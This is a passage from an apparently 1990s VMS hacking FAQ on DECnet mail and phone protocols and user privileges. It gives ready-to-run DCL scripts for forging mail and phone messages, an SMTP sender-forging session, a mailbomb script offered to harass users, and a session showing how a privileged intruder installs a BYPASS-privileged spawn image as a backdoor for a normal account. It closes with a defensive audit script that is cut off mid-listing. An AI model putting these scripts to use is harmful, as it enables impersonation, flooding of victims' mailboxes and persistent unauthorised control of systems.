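	SETUSER/GLOGIN class of tool and the password crackers mentioned
	earlier both revolve around the UAF, and a journal entry for every
	modification to it is cheap.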

		 -       VMSmail/SMTP Information     - 

1.     It is possible to send fake mail through VMSmail objects. DECNet
       object logs are produced and readable by sys admins.

$! To send anonymous or fake messages(except for remote node system admins -
$! mail server logs) through the MAIL mailbox to any user logged on the NET;
$! must only have NETMBX privilege
$null[0,8] = 0
$remote_node = P1
$if P1 .eqs. "" then read sys$command remote_node   /prompt="node: "
$local_user = P2
$if P2 .eqs. "" then read sys$command local_user    /prompt="local user: "
$local_user := 'local_user                      ! remove blanks and lowercases
$real_remote_user = P2
$if P2 .eqs. "" then -
  read sys$command real_remote_user /prompt="real remote user: "
$real_remote_user := 'real_remote_user          ! remove blanks and lowercases
$remote_user = P3
$if P3 .eqs. "" then read sys$command remote_user /prompt="remote user: "
$remote_user := 'remote_user           ! remove blanks and lowercases
$subject = P4
$if P4 .eqs. "" then read sys$command subject       /prompt="subject: "
$filename = P5
$if P5 .eqs. "" then read sys$command filename      /prompt="file name: "
$filename := 'filename
$!
$open/read/write slave 'remote_node'::"27="
$write slave "''local_user'"
$write slave "''real_remote_user'"
$read slave status
$write sys$output f$fao("Addressee status is: !XL",f$cvui(0,8,status))
$write slave null
$if filename .nes. ""
$ then
$  write slave "''remote_user'"
$  write slave "''subject'"
$  open/read/error=end_of_file file 'filename'
$loop:
$  read/end=end_of_file file record
$  write slave "''record'"
$  goto loop
$else
$ write slave "To whomever it concerns"
$ write slave "Demo of using VAXMail protocol"
$ write slave "This is message line"
$endif
$end_of_file:
$close/nolog file
$write slave null
$read slave status
$write sys$output f$fao("Delivery status is: !XL",f$cvui(0,8,status))
$close slave
$exit

	"I am attempting to send fake mail by connecting to the SMTP port,
but every time I issue the 'mail from', it gives me a 'Mailbox syntax
incorrect', or 'Bad arguments'.  I try the standard format I *always*
use, but it *still* gives me this crap!  What's the problem?"......

	Of course, it is possible to send fake mail by connecting to
the VMS machine's SMTP (Simple Mail Transfer Protocol) port (25); 
however, VMS "sendmail" routines tend to be a little more picky.  For 
example, it would *appear* that the session below should work...

------<Start Session>-------

telnet 6.6.6.6 25
Type ^] (decimal 29) <CR> to return to NetBlazer
Trying 6.6.6.10:25...
Telnet session 0 connected to bogus.add.com
220 BOGUS.ADD.COM TGV MultiNet V3.3 Rev C SMTP service ready at Fri, 6 Jan 1995 6:25:01 -0500 (EST)
helo
250 BOGUS.ADD.COM ; Hello , pleased to meet you.
mail from: [email protected]
553 Mailbox syntax incorrect
quit
221 BOGUS.ADD.COM TGV MultiNet V3.3 Rev C SMTP service complete at Fri, 6 Jan 1995 6:25:22 -0500 (EST)
Telnet session 0 closed: EOF

-------<End Session>---------

	As you can see, however, this is not the case.  The problem
lies in the fact that a lot of VMS sendmail routines require "<" and
">" around the "mail from" and "rcpt to" arguments, and sometimes an address
(especially the case with Multinet SMTP and Pathway's Wollongong 
Sendmail).  The angle brackets are in fact what RFC 821 specifies; Unix
sendmail merely tolerates their absence.  In order to get a good mailing
address to "work", try "mail from: <bob@bogus.add.com>".  Some VMS SMTP
services do not require the address, but in most cases the ">" and "<"
are required.  The same applies to the "rcpt to" command.  You might need
to format it the same as the "mail from", i.e. "rcpt to: <system>" or
"rcpt to: <system@bogus.add.com>".   

2.     "Can I use my favorite Unix sendmail holes on VMS sendmail?"

	Don't be silly.  No...  Digital did not believe that sendmail
	bugs and holes were important enough to port (grin).  (It 
	has been rumored that one sendmail hole *was* actually ported, 
	but as of this time, this has not been verified.) 

3.      "How can I code a mail bomb routine,  so that I can piss off
	 people really good and eat 'bandwidth'."

	Like this,  below...  

$! Simple VMS Mailbomb routine. 
$! Please be someone human.   Don't do this crap.
$!
$ say :== write sys$output
$ on error then goto err
$ if p4 .eqs. "" 
$ then 
$ say "Mailbomb V1.0                            Coded By The Beaver"
$ say "1995"
$ say ""
$ say "Usage:"
$ say "MAILBOMB [Msg Subject] [File to bomb with] [Username] [# of Times]"
$ exit
$ endif
$ A=1
$ loop:
$ mail/subject='p1' 'p2' 'p3' 
$ A = A + 1
$ if A .eqs. p4
$       then
$       say "Bomb Is Complete"
$       exit
$       endif
$ goto loop
$ err:
$ say "A Error has occured.  Be sure all file are present and correct"
$ exit

			 - VAXPhone Information -

1.      The phone protocol allows you to send messages.
	Example follows:

$! To send anonymous or fake messages(except for remote node system admins -
$! phone server logs) through the PHONE mailbox to any user logged on the NET,
$! similar to phone ringing messages broadcast to users' terminals; must only
$! have NETMBX privilege
$! Note:
$! This has the unfortunate side effect of kicking the user off his phone if 
$! its not a patched version.
$!
$ debug = "F"
$ null_byte[0,8] = 0
$ true_byte[0,8] = 1
$ false_byte[0,8] = 0
$ id_rmt_user[0,8] = 7          !text = id of remote user, status rtn
$ ring_rmt_user[0,8] = 8        !text = 1 byte, true if first ring, sts rtn
$ hang_up[0,8] = 9              !link broken, no status
$ master_busy[0,8] = 10         !when requested to do other functions
$ master_answer[0,8] = 11       !from another master
$ master_reject[0,8] = 12       !from another master
$ slave_exit[0,8] = 13          !command to slave
$ text[0,8] = 14                !text >= 1 char frag
$ request_dir[0,8] = 15         !null returned when done
$ force_third_party[0,8] = 17   !text is id of 3rd party
$ on_hold[0,8] = 18             !put target on hold
$ off_hold[0,8] = 19            !take target off hold
$!
$ status_unknown = 0    !Unknown problem
$ status_success = 1    !The operation was completed successfully.
$ status_isyntax = 2    !Invalid user syntax
$ status_nocomm = 3     !Slave could not communicate with user
$ status_missunam = 4   !<node::user> missing user name
$ status_nopriv = 5     !The slave does not have necessary privileges.
$ status_noexist = 6    !The specified Target user does not exist.
$ status_badterm = 7    !The Target's terminal cannot be used by PHONE.
$ status_logoff = 8     !The Target logged off during the procedure.
$ status_offhook = 9    !Target phone off hook (e.g., /NOBROADCAST set).
$!
$ remote_node = P1
$ if P1 .eqs. "" then read sys$command remote_node   /prompt="node : "
$ remote_user = p2
$ if P2 .eqs. "" then read sys$command remote_user   /prompt="user : "
$ remote_user := 'remote_user                   ! remove blanks and lowercases
$ local_user_in = "''P3'"
$ if P3 .eqs. "" then read sys$command local_user_in /prompt="text : "
$ local_user = "msg:: " + local_user_in + -
   "                                                                      " -
   + null_byte
$ open/read/write link 'remote_node'::"29="
$ write link id_rmt_user,local_user,remote_user
$ read link ans
$ if f$cvui(0,8,ans) .ne. status_success then goto error
$       if debug then write sys$output "Link to phone setup"
$ if local_user_in .eqs. "" then goto exit
$ write link ring_rmt_user,local_user,true_byte
$ read link ans
$ if f$cvui(0,8,ans) .ne. status_success then goto error
$       if debug then write sys$output "1 ringy-dingy"
$       count = 1
$ on control_y then goto exit
$  goto exit
$LOOP:
$ write link ring_rmt_user,local_user,false_byte
$ read link ans
$ if f$cvui(0,8,ans) .ne. status_success then goto error
$       if count .ge. 3 then goto exit
$       count = count +1
$       if debug then write sys$output count," ringy-dingies"
$ goto loop
$EXIT:
$ write link slave_exit,local_user
$ close link
$       if debug then write sys$output "Link cleared"
$ exit
$ERROR:
$! under development
$ write sys$output "An error has occured."
$ close link
$ exit

2.      The phone protocol allows you to get a list of interactive users on
	a system.
	From DEC's own archives, example follows:

$ vfy = f$verify(f$integer(f$logical("debug")) .or. f$integer('debug'+0))
$ if f$cvui(1,1,'debug'+0) .or. f$cvui(1,1,f$logical("debug")+0) -
    then write sys$error "File: PHONEDIR.COM, 29-Feb-1984"
$!++
$!  PHONEDIR.COM, E2.0 28-Oct-1985
$!
$!  COPYRIGHT (c) 1984 By
$!  DIGITAL EQUIPMENT CORPORATION, Maynard, Massachusetts 01754.
$!  All Rights Reserved.
$!
$!  This software is furnished without license and may be used and  copied
$!  only with the inclusion of the above copyright notice. No title to and
$!  ownership of the software is hereby transferred.
$!
$!  The information in this software is subject to change  without  notice
$!  and  should  not  be  construed as  a commitment by Digital  Equipment
$!  Corporation.
$!
$!  Digital  assumes  no responsibility for the use or reliability of this
$!  software.
$!--
$!++
$!  Author: SWM,  29-Feb-84,  PARROT::SWM
$!
$!  Edited:
$!    23-Nov-84 SWM, User lookup, V3 compatablility, Psthru capability.
$!    24-Nov-84 DC, Added logical name translation.
$!    30-Nov-84 DC, '_' overrides logical, infn loop check.
$!    27-Oct-85 SWM, Protocol fix, pipelining, clean up code.
$!
$!  Abstract:
$!    Take a directory of users across network via phone protocol.
$!
$!  Inputs: P1 = Node:: (or Node::Node::...) to get user list from;
$!    or Node::User to check on.  Remote user can be specified as
$!    separate parameter P2.  Double colon optional if single node.
$!
$!--
$INITIALIZE:
$ on control_y then goto close
$ set noon
$ v4 = "true"
$ if f$extr(0,2,f$getsyi("version")) .eqs. "V3" then v4 = "false"
$!$ error_status = %x1001C002
$ null[0,8] = 0
$!$ if v4 then old_msg = f$envi("message")
$!$ set message /nofacility/noseverity/noidentification/notext
$!
$ask_node_name:
$ if p1 .eqs. "" then read/end=exit/error=exit sys$command p1 /prompt="Node? "
$ if p1 .eqs. "" then goto exit
$!
$! allow override of node::user logical names
$ sanity_check = 0
$log_name_loop:
$ underscore_found = f$locate("_",p1) .eq. 0
$ if underscore_found then goto got_node_name
$ if f$logi(p1) .eqs. "" then goto got_node_name
$ p1 = f$logi(p1)
$ sanity_check = sanity_check + 1
$ if sanity_check .le. 64 then goto log_name_loop
$ goto error
$!
$got_node_name:
$! add username to node string if specified as separate parameter
$ if p2 .nes. "" then -
   if f$extr(f$leng(p1)-2,2,p1) .eqs. "::" then p1 = f$extr(0,f$leng(p1)-2,p1)
$ if p2 .nes. "" then p1 = p1 + "::" + p2
$! check if single node specified without dbbl colon.
$ if p2 .eqs. "" then -
    if f$parse(p1,,,"node") .eqs. "" then p1 = p1 + "::"
$!-    if f$extr(f$leng(p1)-2,2,p1) .nes. "::" then p1 = p1 + "::"
$!
$ if v4 then p1 = f$edit(p1,"trim,upcase,uncomment")
$ if .not. v4 then p1 := 'p1'
$ remote_user_name = f$parse(p1,,,"name")
$ node = f$extr(0,f$leng(p1)-f$leng(remote_user_name),p1)
$ if node .eqs. "" then node = f$logi("sys$node")
$! commented out doesn't work if access ctrl (f$parse hides password).
$!$ remote_user = node - f$parse(f$extr(0,f$leng(node)-2,node),,,"node") -
$!-    + remote_user_name       ! remove any psthru node names...
$!
$ sanity_check = 0
$ temp = node
$ node_string = ""
$! loop to find name of destination node for use in phone protocol...
$dest_node_loop:
$ loc = f$loca("::",temp)
$ node_string = node_string + f$parse(f$extr(0,loc+2,temp),,,"node")
$! commented out for alternate node_string display if using access ctrl.
$!$ node_string = node_string + f$extr(0,loc,temp)
$!$ node_string = f$extr(0,f$loca("""",node_string),node_string) + "::"
$ remote_user = f$extr(0,loc,temp)                      ! last node
$ remote_user = f$extr(0,f$loca("""",remote_user),remote_user) ! minus a/c.
$ temp = f$extr(loc+2,999,temp)
$ sanity_check = sanity_check + 1
$ if f$loca("::",temp) .ne. f$leng(temp) .and. sanity_check .lt. 32 -
    then goto dest_node_loop
$ remote_user = remote_user + "::" + remote_user_name
$!
$ if v4 then local_user = f$logi("sys$node") + -
    f$edit(f$getjpi("","pid"),"trim,upcase")
$ if .not. v4 then local_user := 'f$logi("sys$node")''f$getjpi("","pid")'
$ local_user = local_user - "_" + null                  ! asciz string
$!
$CREATE_LINK:
$! noon is set so display error message
$ open/read/write slave 'node'"29="
$ save_status = $status
$!$ if save_status .eq. error_status then goto unreachable
$ if .not. save_status then goto exit
$!
$ if remote_user_name .eqs. "" then goto dir_function
$LOCATE_FUNCTION:
$ message[0,8] = 7                                      ! ID remote user
$ message = message + local_user + remote_user
$ write/error=error slave message
$ read/end=error/error=error slave record
$ if f$cvui(0,8,record) .eq. 1 then -
    write sys$output "''remote_user' is currently available."
$! Note: These response values, while defined in the phone protocol do
$!   not seem to be supported in response to the ID function for VAXPhone.
$ if f$cvui(0,8,record) .eq. 6 then -
    write sys$output "''remote_user' is not available."
$ if f$cvui(0,8,record) .eq. 7 then -
    write sys$output "''remote_user''s phone is not usable by phone."
$ if f$cvui(0,8,record) .eq. 9 then -
    write sys$output "''remote_user''s phone is off hook (/NOBROADCAST)."
$ if (f$cvui(0,8,record) .ne. 1) .and. (f$cvui(0,8,record) .ne. 6) .and. -
    (f$cvui(0,8,record) .ne. 7) .and. (f$cvui(0,8,record) .ne. 9) then -
   write sys$output "''f$fao("Bad status received = !2ZB.",f$cvui(0,8,record))
$ exit_command[0,8] = 13
$ write/error=error slave exit_command,local_user
$ goto close
$!
$DIR_FUNCTION:
$ message[0,8] = 15                                     ! Request directory
$ message = message + local_user
$ write/error=error slave message
$ write/error=error slave message                       ! Pipeline requests!!!
$ write/error=error slave message
$ write/error=error slave message
$! Pipelining limited to 2 extra requests max to keep procedure from hanging.
$!   Worst case limit is (DECnet_Pipeline_Quota/DECnet_Buffer_Size) * 2 + 1
$print_header:
$ count = 0
$ write sys$output ""
$ write sys$output "	Directory of Users on Node ",node_string
$ write sys$output ""
$! skip pipeline hack code as RMS timeouts don't work with DECnet yet.
$ GOTO LOOP
$!$ if .not. v4 then write/error=error slave message
$ if .not. v4 then goto loop
$! Put up to 8 requests in logical link pipe...
$ sanity_check = 3                                      ! number msgs in pipe.
$pipeline_hack:
$ sanity_check = sanity_check + 1
$ if sanity_check .ge. 8 then goto loop
$ write/error=error slave message
$ read/end=eof/error=pipeline_hack/timeout=0 slave record
$ goto loop_alt_entry
$!
$loop:
$ read/end=eof/error=error slave record
$loop_alt_entry:
$ if record .eqs. "" then goto done
$ write/error=error slave message
$ write sys$output record
$ count = count + 1
$ goto loop
$eof:
$! rsx-11 phone slave closes link after directory function.
$ rsx = "  (System is RSX)"
$done:
$ write sys$output ""
$ write sys$output "Total number of users = ''f$string(count)'''rsx'"
$! don't tell slave to exit if link already closed.
$ if "''rsx'" .nes. "" then goto close
$ exit_command[0,8] = 13
$ exit_command = exit_command + local_user
$ write slave exit_command
$eof_loop:
$ GOTO CLOSE                                            ! Hack!!!
$! Note: Should finish up properly by reading all responses.
$ read/end=close/error=error slave dummy
$!$ write sys$output dummy                              ! show empty data
$ goto eof_loop
$!
$unreachable:                                           ! this removed...
$! this section left in for possible enhanced error checking...
$!$ write sys$output ""
$!$ write sys$output "Node unreachable, unknown, or object unknown."
$ goto exit
$ERROR:
$ write sys$error "PHONEDIR-E-BugCheck, An error has occurred."
$close:
$! close the link no matter what.
$ close /error=exit slave
$exit:
$!$ set message 'old_msg'
$ if vfy then set verify                                ! 'f$verify(0)'
$ exit

	BTW: There is a modified phone program available via
	     anonymous ftp which gives increased functionality
	     with commands such as 'reject' and 'transcribe'

	      -      User/Image Privilege Information     -

1.      "How are user privileges setup?"

	User privileges are handled in a completely different manner
	than under Unix.  With Unix,  you have either

	a> all privileges (IE - "root")
	b> standard user

	VMS is a touch different.

	For example,  let's say you have a field engineer who needs
	a standard user account (I.E. - be able to send/receive mail,
	run standard DCL commands... normal TMPMBX,  NETMBX,  and
	all that),  but in order to do his job he needs to run the
	online VMS diagnostics software (which is a privileged operation).
	When you add the user,  you can grant him the "DIAGNOSE" privilege
	along with the normal user privileges,  and he will be able to run
	regular user commands and the diagnostics.

	What this means is that you can grant certain privileged
	functions to certain users,  rather than giving the user
	"the whole system".

	The user we added would only have the privilege that deals
	with the diagnostic software.  For example,  he could not add
	users (via "AUTHORIZE") or modify SYSUAF.DAT.

"Privileges restrict the use of certain system functions to processes
created on the behalf of authorized users.  These restrictions protect
the integrity of the operating system code,  data,  and resources and
thus,  the integrity of user services."

"Users cannot execute an image that requires a privilege they do not
possess,  unless the image is installed as a known image with the
privilege in question or the image runs within a protected subsystem."

	Privileges can also be installed on images,  so that when that
	image is executed,  the process running the image gets the
	privileges the image has been granted (this does not mean that
	the user gets the privileges,  but rather just the process,
	and only while it is running that image).

			- OpenVMS VAX Guide To System Security
			  (6.0 manual).

	Below is a listing of privileges,  and a brief description.

ACNT      -     Lets a process use the RUN (Process) command or the Create
		Process ($CREPRC) system service to create processes
		in which accounting is disabled.  A process in which
		accounting is disabled is one whose resources are not logged.

ALLSPOOL  -     Lets the user's process allocate a spooled device by
		executing the Allocate Device ($ALLOC) system service
		or by using the DCL command "ALLOCATE".

ALTPRI    -     Allows the user's process to
		1.  Increase its own priority
		2.  Set the base priority of a target process
		3.  Change the priority of its batch or print jobs.

AUDIT     -     Allows software to append audit records to the system
		security audit log file.   As a result,  this privilege
		permits the logging of events that appear to come from the
		operating system.

BUGCHK    -     Allows the process to make bugcheck error log entries
		from user,  supervisor,  or compatibility mode,  or to send
		messages to the system error logger.

BYPASS    -     Allows the user's process full access to all protected
		objects,  totally bypassing UIC-based protection,
		ACL (Access Control List) protection and mandatory
		access controls.   Users with this privilege can
		modify authorization records (SYSUAF.DAT,  where
		usernames/passwords are stored),  rights identifiers
		(RIGHTSLIST.DAT),  DECnet object passwords and accounts
		(NETOBJECT.DAT),  and have unlimited file access.

CMEXEC    -     Allows the user's process to execute the Change Mode to
		Executive system service.

CMKRNL    -     Allows the user's process to execute the Change Mode to
		Kernel system service.   This allows things like
		modifying multiprocessor operation (START/CPU and
		STOP/CPU type commands),  modifying the system
		rights list (SET RIGHTS/ATTRIBUTE),  changing a process's
		UIC (SET UIC),  and other functions.

DETACH    -     Processes can create detached processes that have their
		own UIC without the DETACH privilege,  provided the
		process wants to specify a different UIC for the

DIAGNOSE  -     Lets a process run online diagnostic programs and intercept
		and copy all messages written to the error log file.

DOWNGRADE -     Permits a process to manipulate mandatory access controls.

EXQUOTA   -     Allows the space taken by the user's files on a given
		disk volume to exceed any usage quotas set for the user
		(as determined by UIC) on that volume.

GROUP     -     Allows the user's process to affect other processes in its
		own group.

GRPNAME   -     Lets the user's process bypass discretionary access controls
		and insert names into (and delete names from) the logical
		name table of the group to which the process belongs,  by
		using the Create Logical Name and Delete Logical Name
		system services.

GRPPRV    -     When the process's group matches the group of the object
		owner,  the GRPPRV privilege gives a process the access rights
		provided by the object's system protection field.  GRPPRV
		also lets a process change the protection or the
		ownership of any object whose owner group matches the
		process's group,  by using the DCL command SET SECURITY.

IMPORT    -     Lets a process manipulate mandatory access controls.  The
		privilege lets a process mount unlabeled tape volumes.
		This privilege is reserved for enhanced security products
		like SEVMS.

LOG_IO    -     Lets the user's process execute the Queue I/O Request
		($QIO) system service to perform logical-level I/O
		operations.

MOUNT     -     Lets the user's process execute the mount volume QIO
		function.

NETMBX    -     Lets a process perform functions related to a DECnet
		computer network.

OPER      -     Allows a process to use the Operator Communication
		Manager (OPCOM) process to reply to users' requests,
		to broadcast messages to all terminals logged in,  to
		designate terminals as operator terminals and specify
		the types of messages to be displayed on those operator
		terminals,  and to initialize and control the log file
		of operator messages.

PFNMAP    -     Lets a user's process create and map page frame number
		(PFN) global sections to specific pages of physical
		memory or I/O device registers,  no matter who is using
		the pages or registers.

PHY_IO    -     Lets the user's process execute the Queue I/O Request
		($QIO) system service to perform physical-level I/O
		operations.

PRMCEB    -     Lets the user's process create or delete a permanent
		common event flag cluster by executing the Associate
		Common Event Flag Cluster system service.

PRMGBL    -     Lets the user's process create or delete permanent
		global sections by executing the Create and Map Section
		or Delete Global Section system services.  In addition,
		a process with this privilege (plus CMKRNL and SYSGBL
		privileges) can use the Install utility (INSTALL).

PRMMBX    -     Lets the user's process create or delete a permanent mailbox
		by the Create Mailbox and Assign Channel system service
		or the Delete Mailbox system service.   Mailboxes are
		buffers in virtual memory that are treated as if they were
		record oriented I/O devices.  A mailbox is used for
		general interprocess communication.

PSWAPM    -     Lets the user's process control whether it can be
		swapped out of the balance set by executing the
		Set Process Swap Mode system service.

READALL   -     Lets the process bypass existing restrictions that would
		otherwise prevent the process from reading an object.
		Unlike the BYPASS privilege,  which also permits writing and
		deleting,  READALL permits only the reading of objects
		and the updating of such backup-related file
		characteristics as the backup date.

SECURITY  -     Lets a process perform security related functions such
		as modifying the system password with the DCL command
		SET PASSWORD /SYSTEM or modifying the system alarm
		and auditing settings using the DCL command
		SET AUDIT.

SETPRV    -     Lets the user's process create processes whose privileges
		are greater than its own.   With this privilege,  a user
		can obtain any other privilege via the DCL command
		"SET PROCESS/PRIV".

SHARE     -     Lets a process assign channels to devices allocated to other
		processes,  or to a nonshared device,  via the Assign I/O
		Channel system service.

SHMEM     -     Lets the user's process create global sections and
		mailboxes (permanent or temporary) in memory shared by
		multiple processors if the process also has the appropriate
		PRMGBL,  PRMMBX,  SYSGBL,  and TMPMBX privileges.

SYSGBL    -     Lets the user's process create or delete system global
		sections by executing the Create and Map Section or the
		Delete Global Section system services.  With this privilege
		plus CMKRNL and PRMGBL,  the Install utility (INSTALL)
		can be used.

SYSNAM    -     Lets the user's process bypass discretionary access
		controls and insert names into the system logical
		name table and delete names from that table.  A
		process with this privilege can use the DCL commands
		ASSIGN and DEFINE to add names to the system logical
		name table in user or executive mode,  and can use the
		DEASSIGN command in either mode to delete names from
		the table.

SYSPRV    -     Lets a process access security objects by the system
		protection field and also read and modify the owner
		(UIC),  the UIC-based protection code,  and the ACL
		of an object.   Any process with this privilege
		can add,  modify,  or delete entries in the system
		user authorization file (SYSUAF.DAT).

TMPMBX    -     Lets the user's process create a temporary mailbox
		by executing the Create Mailbox and Assign Channel
		system service.

UPGRADE   -     Lets a process manipulate mandatory access controls.  This
		privilege is reserved for enhanced security products like
		SEVMS.

VOLPRO    -     Lets the user's process:
			o Initialize a previously used volume with an owner
			  UIC different from the user's own UIC.
			o Override the expiration date on a tape or
			  disk owned by another user.
			o Use the /FOREIGN qualifier to mount a Files-11
			  volume owned by another user.
			o Override the owner UIC protection of a volume.

WORLD     -     Lets the user's process affect (suspend,  resume,  delete,
		set priority,  wake,  etc.) other processes both inside
		and outside its group.

				- Taken Mostly From the, "OpenVMS VAX
				  System Security" (V6.0) 

2.      "How can I make a SUID Shell in VMS"....

	Simple...  You can't.   Privileges are handled in a much different
	way than on Unix (see "How are user privileges setup").  What you
	can do is make a program (image) such that,  when it is executed,
	the process running that image gains the privileges the image was
	"installed" with.    For example,  if you write a program that needs
	read access to SYSUAF.DAT you *could* make SYSUAF.DAT world readable
	(if you are on a privileged account,  of course)  but this
	would be very,  very unwise.    Another method would be to
	"INSTALL" the executable image and give it the READALL privilege,
	so that when a user's process runs your program,  that process
	(while the image is running) gets READALL.   That
	process would then be able to read SYSUAF.DAT,   but the user's
	process would not have the privilege otherwise.

	With this in mind,   it is possible to create a scenario similar
	to that of a "SUID shell" (but without the shell).  The idea
	is to put the privileges (that you want to keep hold of)
	on a program that does nothing more than make a call to
	LIB$SPAWN:  write a program that simply creates another process
	(which drops you to DCL) via LIB$SPAWN,  and using the VMS "INSTALL"
	utility,  give it the privileges that you wish that process to have.
	There are several drawbacks to this.  To accomplish it,  you need
	the privileges INSTALL itself requires (CMKRNL,  plus PRMGBL and
	SYSGBL,  see above),  so your process would already need to be
	privileged to pull this off.  The idea here is that in the event
	a user has obtained a "privileged account",  and wishes to remain
	privileged,  he/she could install an image which could be called
	by a normal (non-privileged) user and through which he/she could
	obtain the system privileges again.  Keep in mind that the installed
	image is visible to anyone who runs INSTALL LIST/FULL,  which is
	exactly where an administrator should look for one.

	Below is a sample session capture of me installing a privileged
	image.   The privilege I gave this image is "BYPASS" (bypass
	all security features,  and the ability to modify SYSUAF.DAT
	and RIGHTSLIST.DAT).

Trying...
Connected to UpperDck
Escape character is '^]'.

		       Upper-Dck VMS Development System 

Username: SYSTEM   ! Login to our privileged account
Password: 
	Welcome to VAX/VMS version V5.2 on node UPPERDCK
    Last interactive login on Friday,  6-JAN-1995 07:17
    Last non-interactive login on Thursday, 22-DEC-1994 15:51

 User= SYSTEM       Directory= [SYSMGR]       UIC=  [1,4]
	Terminal= NTY5:       6-JAN-1995 07:19:01.00

sysm>basic      ! I am going to use VMS BASIC,  but use anything you want

VAX BASIC V2.3

Ready

10 external long function lib$spawn ! Call "SPAWN" library.  The idea with this
   declare long xspawn              ! program is to give us another "spawned"
   xspawn=lib$spawn()               ! process. 

save mytrap             ! Save this program
Ready

exit                    ! and exit the VMS BASIC. 
sysm>dir mytrap*.*      ! Just to show our file.

Directory SYS$SYSROOT:[SYSMGR]

MYTRAP.BAS;1        

Total of 1 file.
sysm>basic mytrap       ! This will compile and make our object code
sysm>dir mytrap*.*      ! To show our object code. 

Directory SYS$SYSROOT:[SYSMGR]

MYTRAP.BAS;1        MYTRAP.OBJ;1        

Total of 2 files.

sysm>link mytrap/notraceback  ! Link it, with notraceback (for priv reasons)
sysm>dir mytrap*.*            ! To show our executable code.

Directory SYS$SYSROOT:[SYSMGR]

MYTRAP.BAS;1        MYTRAP.EXE;1        MYTRAP.OBJ;1        

Total of 3 files.

sysm>copy mytrap.exe sys$system:  ! copy it to sys$system: [this is silly] 
sysm>install                      ! Run install to set up privs on our image.
INSTALL> create mytrap/priv=(bypass) ! Give "mytrap" bypass priv's
INSTALL> list mytrap/full            ! Just to show off the image priv's

DISK$VAXVMSRL5:<SYS6.SYSEXE>.EXE
   MYTRAP;2                       Prv 
	Entry access count         = 0
	Privileges = BYPASS 

INSTALL> exit                    ! Get the hell out of here.
sysm>dir sys$system:mytrap.exe   ! And just to show its still there

Directory SYS$SYSROOT:[SYSEXE]

MYTRAP.EXE;2        MYTRAP.EXE;1        

Total of 2 files.

sysm>dir sys$system:mytrap.exe;2 /full ! Notice "world" protections...

Directory SYS$SYSROOT:[SYSEXE]

MYTRAP.EXE;2                  File ID:  (43314,33,0)       
Size:            4/6          Owner:    [1,4]
Created:   6-JAN-1995 07:20:26.35
Revised:   6-JAN-1995 07:20:41.54 (2)
Expires:   <None specified>
Backup:    <No backup recorded>
File organization:  Sequential
File attributes:    Allocation: 6, Extend: 0, Global buffer count: 0
		    No version limit, Contiguous best try
Record format:      Fixed length 512 byte records
Record attributes:  None
RMS attributes:     None
Journaling enabled: None
File protection:    System:RWED, Owner:RWED, Group:RE, World:
Access Cntrl List:  None

sysm>set file sys$system:mytrap.exe /protection=(w:re) ! because world cant
sysm>log                                               ! read/execute. Logout. 

  SYSTEM       logged out at  6-JAN-1995 07:42:02.55
Connection closed by foreign host.

	[Now,  we make a new connection to the system to test our ]
	[ "MYTRAP.EXE" with the image priv's attached to it       ]

Trying...
Connected to UpperDck.
Escape character is '^]'.

		       Upper-Dck VMS Development System 

Username: JOEBOB        ! Now, log as a normal user. 
Password: 
	Welcome to VAX/VMS version V5.2 on node UPPERDCK
    Last interactive login on Friday,  6-JAN-1995 07:14

 User= JOEBOB        Directory= [UPPERDCK]       UIC=  [130,163]
	Terminal= NTY6:       6-JAN-1995 07:42:12.00

UPDCK> show process/priv ! To prove that we have normal user priv's

 6-JAN-1995 07:42:27.01   User: JOEBOB           Process ID:   0000010F
			  Node: UPPERDCK         Process name: "JOEBOB"

Process privileges:
 TMPMBX               may create temporary mailbox
 NETMBX               may create network device

Process rights identifiers:
 INTERACTIVE
 LOCAL
 SYS$NODE_UPPERDCK
UPDCK> set proc/priv=bypass ! To prove I can't enable "BYPASS" privs
%SYSTEM-W-NOTALLPRIV, not all requested privileges authorized
UPDCK> mcr mytrap           ! Run our little "privilege provider"
UPDCK> show process/priv    ! To show our priv's after we exec. MYTRAP.EXE
			    ! note that we are spawned (see PID and Proc. Name)

 6-JAN-1995 07:42:46.05   User: JOEBOB           Process ID:   00000110
			  Node: UPPERDCK         Process name: "JOEBOB_1"

Process privileges:
 TMPMBX               may create temporary mailbox
 NETMBX               may create network device

Process rights identifiers:
 INTERACTIVE
 LOCAL
 SYS$NODE_UPPERDCK
UPDCK> set process/priv=bypass ! Note,  no error when we do this now. 
UPDCK> show process/priv       ! To prove that we have gained BYPASS

 6-JAN-1995 07:42:53.37   User: JOEBOB           Process ID:   00000110
			  Node: UPPERDCK         Process name: "JOEBOB_1"

Process privileges:
 TMPMBX               may create temporary mailbox
 NETMBX               may create network device
 BYPASS               bypasses UIC checking 

Process rights identifiers:
 INTERACTIVE
 LOCAL
 SYS$NODE_UPPERDCK
UPDCK> logout ! I can pretty much do anything now.... Lets stop this subprocess
  Process JOEBOB_1 logged out at  6-JAN-1995 07:42:59.01
UPDCK> logout ! logout completely

  JOEBOB       logged out at  6-JAN-1995 07:43:05.11
Connection closed by foreign host.
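
	The audit side of this,  as an added example that is not part of the
	FAQ or its author's session:  a short Python script that reads a saved
	INSTALL LIST/FULL listing offline and reports every image installed
	with privileges that is missing from a baseline,  or whose privilege
	set has drifted from it.  The listing layout follows the MYTRAP listing
	above;  the sample listing and the baseline of expected privileges are
	constructed for the example,  so record a real baseline from a
	known-good system before relying on it.

```python
"""Offline audit of an INSTALL LIST/FULL capture for privileged images.

Added example, not from the FAQ.  Save the listing on the VMS node with
    $ INSTALL LIST/FULL/OUTPUT=INSTALLED.LIS
and run this script over the file.  The baseline and the sample listing
below are constructed for this example; they are not real shipped values.
"""
import re

# Privileges that, on an installed image anyone can run, amount to full
# control of the system (taken from the privilege list in this FAQ).
CRITICAL = {"BYPASS", "CMKRNL", "CMEXEC", "SETPRV", "SYSPRV", "READALL",
            "SECURITY", "PFNMAP", "PHY_IO", "LOG_IO", "DETACH", "SYSNAM"}

# Constructed baseline: image name -> privileges it is expected to carry.
BASELINE = {
    "LOGINOUT": {"CMKRNL", "SYSNAM", "TMPMBX", "EXQUOTA", "SYSPRV"},
    "SET":      {"CMKRNL", "SYSPRV"},
    "SHOW":     {"WORLD"},
}

# Constructed sample in the same layout as the MYTRAP listing in the FAQ:
# a directory header, images indented three spaces, then attribute lines.
SAMPLE_LISTING = """\
DISK$VAXVMSRL5:<SYS6.SYSEXE>.EXE
   LOGINOUT;1                     Open Hdr Shar Prv
\tEntry access count         = 44
\tPrivileges = CMKRNL SYSNAM TMPMBX EXQUOTA SYSPRV
   SET;1                          Open Hdr Shar Prv
\tEntry access count         = 2
\tPrivileges = CMKRNL SYSPRV
   SHOW;1                         Open Hdr Shar Prv
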